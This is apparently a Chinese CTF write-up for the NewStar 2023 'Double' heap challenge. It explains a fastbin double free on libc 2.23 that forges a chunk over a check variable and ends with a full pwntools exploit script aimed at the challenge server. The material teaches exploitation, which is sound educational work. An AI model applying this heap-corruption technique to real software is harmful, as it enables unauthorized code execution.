newstar2023 week4 - Double

newstar2023 week4 - Double

RocketDev

文件分析

下载Double, NX on, PIE off, Canary on, RELRO full
ghidra分析为64位程序

解题思路

堆入门题,打开了我学习堆的大门

题目要求check_num[2] = 0x666就可以给shell,由于目标libc是2.23, 所以可以直接利用fastbin的double free,伪造一个块到check_num上 (size已经帮我们伪造好了)

前置知识

fastbin double free由于检查少,因此较为简单,但是仍要注意: 必须隔一个释放,且必须把需要伪造的块头处理好

double free legend

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
sh = remote('node4.buuoj.cn', 29665)

def add(idx:int, con:bytes=b'what'):
sh.recvuntil(b'>')
sh.sendline(b'1')
sh.recvuntil(b'idx')
sh.sendline(str(idx).encode())
sh.recvuntil(b'ent')
sh.sendline(con)

def rem(idx:int):
sh.recvuntil(b'>')
sh.sendline(b'2')
sh.recvuntil(b'idx')
sh.sendline(str(idx).encode())

def chk():
sh.recvuntil(b'>')
sh.sendline(b'3')

add(0)
add(1)
rem(0)
rem(1)
rem(0)

add(0, p64(0x602060)) # fd override (chunk 0 now points to fake chunk)
add(1)
add(2)

add(3, p64(0x666)) # fake chunk allocated
chk()
sh.interactive()

Done.

  • 标题: newstar2023 week4 - Double
  • 作者: RocketDev
  • 创建于 : 2023-10-17 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/10/17/W4_Double/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
newstar2023 week4 - Double